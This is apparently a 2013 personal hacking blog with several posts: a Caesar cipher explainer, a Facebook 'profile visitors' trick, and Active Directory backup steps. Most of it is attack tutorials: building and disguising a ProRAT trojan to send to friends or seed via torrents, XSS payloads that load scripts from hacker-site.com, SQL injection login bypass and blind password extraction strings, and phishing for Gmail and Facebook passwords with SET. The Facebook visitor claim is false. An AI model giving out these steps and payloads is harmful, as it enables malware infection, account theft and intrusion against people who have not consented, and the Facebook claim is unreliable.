rss
twitter
    Find out what I'm doing, Follow Me :)

Saturday, 9 November 2013

Caesar Table or Caesar Cipher

Caesar Table
As I told you earlier, Caesar Table is an oldest method of encryption. Hope you, who reading this blog knows what encryption means.Simply it use to scramble known message to a coded one.
    Julias Caeser done it quite long ego & I always surprise the knowledge ancient rome poses.Most modern encryption involve serious mathematics.But the motto is same as before.
   Caeser Table is a simple encryption method based on substitution,where an alphabet replaced with X no of  next alphabet.Remember here "X" is ket,same like a password.
Example: 
ZNOY OY G YOSVRK IUJK ZU HXKGQ
In above code, I use X=6 
So  lets break it. simple method is bellow
Normal Text Series
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Coded text Series(Each altered with next 6th letter)
G H I J K L M N O P Q R S T U V W X Y Z A B C D E F

Now as per above
Z=T, N=H, O=I so on, now here is the decrypted message.

"THIS IS A SIMPLE CODE TO BREAK" 
Voila, You taken the first step to the encryption.
Its seem very easy but not till you guess the value of X.
But keep trying & testing all value of X=(1-26), It surely break.
Hope now you can break the code of my FB page.
Let me know if you like it.It will encourage me to share you 
some other fascinating method of "Coding World".

 


Sunday, 27 October 2013

Amazing Facebook Trick

 FIND WHO VISITING YOUR PROFILE !!!


Hey Friends, We all know Facebook didn't have a direct facility to track your profile visitor like orkut. Some Facebook application claim to find out that for you but not so trustable.
I will tell you a genuine way to find it out. Its work 100%.
 
Step 1) Go to your Facebook Profile Page.
Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.
Step 3) Now press Ctrl + F from your keyboard to open search box.
Step 4) Now search this code       {"list":
Step 5) You find some Facebook Profile Ids
["InitialChatFriendsList",[],{"list":["100005005264935-2","100003364669752-2",
 
Note: The id on 1st is one who visit your profile most!!! :) 
 

Step 8) Now if your want to findout, Open a new tab Enter below link : www.facebook.com/Facebook Profile Id
For Example : www.facebook.com/100001257992965
 Don't Forget to share your feedback when you smile seeing the result

Thursday, 24 October 2013

A simple Backdor- Hacking For Beginer

 ProRAT

ProRat is a Microsoft Windows based backdoor trojan horse, more commonly known as a RAT (Remote Administration Tool).
Step 1: Download free software called PRO RAT.
Launch pro rat. Pro rat has a lot options as keylogger, screen shot, file manager, pc shutdown.
Step 2: You should create ProRat Server and send it to the target pc. To create server click on the bottom Create.

Step 3: Enter your IP address, if you don't know your IP address click on red arrow. Also add your email address that will be used to send email notification.

Step 4: Next go to general settings, 5110 is the port that you will connect to the target PC, you can change server password. You can give a fake error message, when the target launches your remote file, error message will be shown. You can type the error message whatever you want. You can use the option to bind with the file. You can bind server with any file. Under server extension I recommend to use EXE (has icon support ) or SCR (has icon support). Under server icon select any icon that you want that your server look out.

Step 5: Click on Create Server. Now you need to send server file to the target pc. There are many ways how you can do it. You can create server file that looks as image and email it to your friends . The most effective way by my opinion is to bind server file to the movie file and upload it to the torrent or any file hosting site.


Step 6: After the target clicks on your server file, you'll be able to connect to the target PC. In main window of pro rat you'll see IP field. Type target PC IP Address. In the port field type 5110 and click Connect.

You’ll see the File Manager of hacked pc. You can download any file from the hacked PC


Download Here : ProRAT 2.0

Monday, 19 August 2013

XSS Unleashed

XSS Attack
XSS: XSS stands for Cross Site Scripting.

XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

Trust me thousands of website are at risk of this attack. In earlier day I have seen this vulnerability in many popular website like Rediff, Yahoo,Adobe Flash Player, even MI5 website. yahoo still has one great flaw in XSS, If you able to use it you can have access to any Yahoo user account(Unethical though).Don't ask me how to (Be ethical always), To know just google Yahoo DOM XSS
Before You Start:
1.Learn some basic of website scripting.
2.If you are an web developer, make sure you test your site/application before going live.Don't ignore the power of XSS.
3.Try to understand the terms used in this article(In case you are a novice)
4. To get deep into it get trained. 
5. If you are just a Internet User don't fool yourself by thinking if you don't click on any link you will be protected from XSS.  

XSS Attack Vectors:

So how does a hacker infect your web page in the first place? You might think, that for an attacker to make changes to your web page he must first break the security of the web server and be able to upload and modify files on that server. Unfortunately for you an XSS attack is much easier than that.

Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as <p> for paragraph, <img> for image and <script> for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behavior. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.

By now you should be aware that any sort of data that can land on your web page from an external source has the potential of being infected with a malicious script, but in what form does the data come?

<SCRIPT>

The <SCRIPT> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms:

External script:

<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>

Embedded script:

<SCRIPT> alert(“XSS”); </SCRIPT>

<BODY>

The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:

<BODY ONLOAD=alert("XSS")>

The BACKGROUND attribute can be similarly exploited:

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG>

Some browsers will execute a script when found in the <IMG> tag as shown here:

<IMG SRC="javascript:alert('XSS');">

There are some variations of this that work in some browsers:

<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">

<IFRAME>

The <IFRAME> tag allows you to import HTML into a page. This important HTML can contain a script.

<IFRAME SRC=”http://hacker-site.com/xss.html”>

<INPUT>

If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it can be manipulated to embed a script:

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<LINK>

The <LINK> tag, which is often used to link to external style sheets could contain a script:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<TABLE>

The BACKGROUND attribute of the TABLE tag can be exploited to refer to a script instead of an image:

<TABLE BACKGROUND="javascript:alert('XSS')">

The same applies to the <TD> tag, used to separate cells inside a table:

<TD BACKGROUND="javascript:alert('XSS')">

<DIV>

The <DIV> tag, similar to the <TABLE> and <TD> tags can also specify a background and therefore embed a script:

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

The <DIV> STYLE attribute can also be manipulated in the following way:

<DIV STYLE="width: expression(alert('XSS'));">

<OBJECT>

The <OBJECT> tag can be used to pull in a script from an external site in the following way:

<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">

<EMBED>

If the hacker places a malicious script inside a flash file, it can be injected in the following way:

<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">


Testing if a Site is exposed to XSS:
A simple test to see if your website is vulnerable to a cross-site scripting attack is to enter the following code snippet into a form field and submit the form:

<script>alert("Vulnerable to XSS");</script>

If an alert window pops up with the "Vulnerable to XSS" message when the form data is processed and displayed, then the application accepts tags and is at risk because the input data has not been validated either before being processed or being published.
here are three known types of cross site scripting: reflected, stored, and DOM injection. Reflected XSS is the easiest to exploit – a page will reflect user supplied data directly back to the user:

echo $_REQUEST['userinput'];

Stored XSS takes hostile data, stores it in a file, a database, or other back end system, and then at a later stage, displays the data to the user, unfiltered. This is extremely dangerous in systems such as CMS, blogs, or forums, where a large number of users will see input from other individuals.

With DOM based XSS attacks, the site’s JavaScript code and variables are manipulated rather than HTML elements. Alternatively, attacks can be a blend or hybrid of all three types. The danger with cross site scripting is not the type of attack, but that it is possible.

Attacks are usually implemented in JavaScript, which is a powerful scripting language. Using JavaScript allows attackers to manipulate any aspect of the rendered page, including adding new elements (such as adding a login tile which forwards credentials to a hostile site), manipulating any aspect of the internal DOM tree, and deleting or changing the way the page looks and feels. JavaScript allows the use of XmlHttpRequest, which is typically used by sites using AJAX technologies, even if victim site does not use AJAX today.

Tools:

1.Acunetix Web Vulnerability Scanner (testing tool)
2. XSSer (Attack tool with GUI Interface, My fav)
3. XSS-proxy (Powerfull & Customizable, Command line tool) 

    Get your hand dirty with these tool & play fair.Let me know any query you have after reading this article(I'm sure you have a lottt)
 

Tuesday, 13 August 2013

A beginner guide to Sql Injection

 SQL Injection
SQL injection is currently the most common form of web site attack in that web forms are very common, often they are not coded properly and the hacking tools used to find weaknesses and take advantage of them are commonly available online. This kind of exploit is easy enough to accomplish that even inexperienced hackers can accomplish mischief. However, in the hands of the very skilled hacker, a web code weakness can reveal root level access of web servers and from there attacks on other networked servers can be accomplished.

Structured Query Language (SQL) is the nearly universal language of databases that allows the storage, manipulation, and retrieval of data. Databases that use SQL include MS SQL Server, MySQL, Oracle, Access and Filemaker Pro and these databases are equally subject to SQL injection attack.

Web based forms must allow some access to your database to allow entry of data and a response, so this kind of attack bypasses firewalls and endpoint defenses. Any web form, even a simple logon form or search box, might provide access to your data by means of SQL injection if coded incorrectly. 

Take A Note Before Start:
1. Just reading this article will not enough to be master of it.
2. Trying these on any website is unethical & offensive too in many country.
3. Make your hand & mind dirty with SQL syntax before going deep into powerful aspect of this method.
4. Learn to find Vulnerable Site using google. Trust me "Google Hacking Database" will teach you amazing secret of Google.
5. Trust in yourself,Don't allow failure to Stop you.Good Luck  
How to Identify a Site Vulnerable to an SQL Injection Attack:If a web page accepts text entry (for example a user name and password) then try entering a string that contains one single quote
A vulnerable site may behave oddly & give lengthy error message.

Fingerprinting the Database

Even the SQL language is a standard, every DBMS has its peculiarity and differs from each other in many aspects like special commands, functions to retrieve data such as users names and databases, features, comments line etc.
When the testers move to a more advanced SQL injection exploitation they need to know the backend.

The first way to find out which is the backend is by observing the error returned by the application. Follow are some examples:
MySql:
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\'' at line 1
Oracle:
ORA-00933: SQL command not properly ended
MS SQL Server:
Microsoft SQL Native Client error ‘80040e14’
Unclosed quotation mark after the character string
PostgreSQL:
Query failed: ERROR: syntax error at or near
"’" at character 56 in /www/site/test.php on line 121.
To gain access and find a user name:
Enter the string  'OR''='  as both user name and password in the login page. This should get you logged in as a user (it happens to be the first user in the table).It will work if that site is programmed by a novice.
Say you login as "antony". But you will not able to know the password. Don't worry... Read next few line, You can see it also possible.
As you should have gained access as "antony" however you still do not know antony's password. You can now find this out using a little trial and error. Before you continue try taking a guess at antony's password by entering antony as user name and your best guess at his password.
Work out antony's password:
You can now get the system to answer questions about the password table. It will only ever answer yes (and let you in) or no (by refusing entry). Your questions must take the form of a valid SQL query. In each case use a xx for the user name and the text shown as password. You can ask questions such as:
Does antony's password have a w in it?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '%w%') AND ''='
Does antony's password start with w?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE 'w%') AND ''='
Does antony's password have an w followed by d?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '%w%d%') AND ''='
Is the fourth letter of antony's password w?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '___w%') AND ''='

This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any string, the _ wildcard matches a single character.
Find a user names using SQL Injection:

You can find other users on the system. We choose to get antony's password simply because he was the first in the list but there may be others.
You can still only ask yes/no questions, but you can find out just about anything you want to with a little patience.
Again you use xx for the user name and enter the following as password:
Are there more than 10 rows in the password table?
    ' OR (SELECT COUNT(*) FROM users)>10 AND ''='
Is there a user with an r in his name?
    ' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
Is there a user (other than jake) with an a in his name?
    ' OR EXISTS(SELECT * FROM users WHERE name!='jake' AND name LIKE '%a%') AND ''='

Tools(Click to Download & Try):
1. Havij SQL Injection

2. Pangolin   (Link contain supported download also)
3. The Mole   

4. SQLNinja  (Inbuilt in Backtrack 5)   (Linux Version)
5. Safe3SI    

6. BSQL Hacker (good one, More compitablity)    Link:
7. Sqlmap (My Fav, Little hazy but work fine when used properly)    

Saturday, 18 May 2013

 Password Attack using Social Engineering Toolkit

Continuing my last post about password attack.. Have you tried my previously discussed tricks???
Whatever, I will discuss about other password recovery method.
Rather then direct attacking you also try these two method.
1) Phishing:- This method used to create a fake login page of a popular website such as
Gmail, Yahoo, Facebook & Orkut etc .So when ever any user enter username & password it
send to tour per-defined e-mail id.Using it you can easily hack gmail or facebook password.
Though I always ask you to keep the word "Ethical" in mind. So be a good chap. Try it for fun and educational purpose.  Design a absolute duplicate copy of those page are really tough.
But don't worry with the right tool this is piece of cake. The best one I used a lot during my training demonstration is SET(Social Engineering Toolkit). Trust me, with a little look out you can do the phishing attack
in some simple step.

You need
1.An  internet connection
2. SET  (Inbuilt-ed in many Penetration testing distribution such as Backtrack)
3. A little creativity to trap your target (There are lot of method you can use as per your scenario)
4. Having familiar with Backtrack live CD & Metasploit Framework can be a great advantage

Currently I am giving you a great link to know how to use  it.
Step by Step Guide to SET


Beside the phishing SET has lot of feature:-

a) Hack a remote computer
b) Create a exploited USB media, when run on victim PC that will be automatically accessible
c) Running an exploited web server to hack a PC

Let me know if any further guide is needed.

Friday, 17 May 2013

Active Directory Backup



Active Directory Backup & Restoration in Server 2008


Before Going Through this install Backup from Server Manager
1. Open up your command prompt by clicking Start and type “cmd” and hit enter.
2. In your command prompt type 
wbadmin start systemstatebackup -backuptarget:e: 
and press enter.
Note: You can use a different backup target of your choosing
3. Type “y” and press enter to start the backup process.

When the backup is finished running you should get a message that the backup completed successfully. If it did not complete properly you will need to troubleshoot.

Now you have a system state backup of your 2008 Server!
Authoritative Restore of Active Directory
So now what if you accidentally delete an OU, group, or a user account and it’s already replicated to your other servers? We will need to perform an authoritative restore of the Active Directory object you accidentally deleted.
1. To do this you will need to boot into DSRM (Directory Services Restore Mode) by restarting your server and pressing F8 during the restart.
2.Choose Directory Services Restore Mode from the Advanced Boot menu.

3. Login to your server with your DSRM password you created during Active Directory installation.
4. Once you’re logged into your server and in DSRM safe mode, open a command prompt by clicking Start, type “cmd“, and press enter.
5. To make sure you restore the correct backup it’s a good idea to use the “wbadmin get versions” command and write down the version you need to use.

6. Now we need to perform a non-authoritative restore of Active Directory by typing
wbadmin start systemstaterecovery -version:04/14/2009-02:39
Note: The version of backup will vary depending on your situation. Type “y” and press enter to start the non authoritative restore.
7. Go grab some coffee and take a break while the restore completes.

8. You can mark the sysvol as authoritative by adding the –authsysvol switch to the end of the wbadmin command.

9. But if you want to restore a specific Active Directory object then you can use the ever familiar ntdsutil.
For this example we are going to restore a user account with a distinguished name of 
"CN=Test User,CN=Users,DC=example,DC=com"
So the commands would be:
ntdsutil
activate instance ntds
authoritative restore
restore object “cn=Test User,cn=Users,dc=example,dc=com”
Note: The quotes are required

10. Reboot your server into normal mode and you’re finished. The object will be marked as authoritative and replicate to the rest of your domain.

Using Active Directory Snapshots
There is a really cool new feature in Windows Server 2008 called Active Directory Snapshots. Volume Shadow Copy Service now allows us to take a snapshot of Active Directory as a type of backup. They are very quick to create and serve as another line of defense for your backup strategy.
With your server booted into normal mode open a command prompt by clicking Start, type “cmd“, and press enter.
We are going to use the ntdsutil again for creating the Active Directory snapshots. The commands are:
ntdsutil
snapshot
activate instance ntds
create
quit
quit

So now that you have a snapshot of AD, how do you access the data? First we need to mount the snapshot using ntdsutil. The commands are:
ntdsutl
snapshot
list all
mount 1
— (Note: You should mount the correct snapshot you need; for this example there is only 1.)
quit
quit

Your snapshot is mounted, but how do you access the data? We need to use the dsamain command to accomplish this. Then we need to select an LDAP port to use. The command is as follows:

dsamain –dbpath c:\$SNAP_200905141444_VOLUMEC$\WINDOWS\NTDS\ntds.dit –ldapport 10001
The result should look like this:

Now we need to go to Start, Administrative Tools, then Active Directory Users and Computers.
Right click Active Directory Users and Computers and select Change Domain Controller.

In the area that says < Type a Directory Server name [:port] here > enter the name of your server and the LDAP port you used when running the dsamain command.
For my example it would be: WIN-V22UWGW0LU8.HOME.LOCAL:10001

Now you can browse the snapshot of Active Directory without affecting anything else negatively.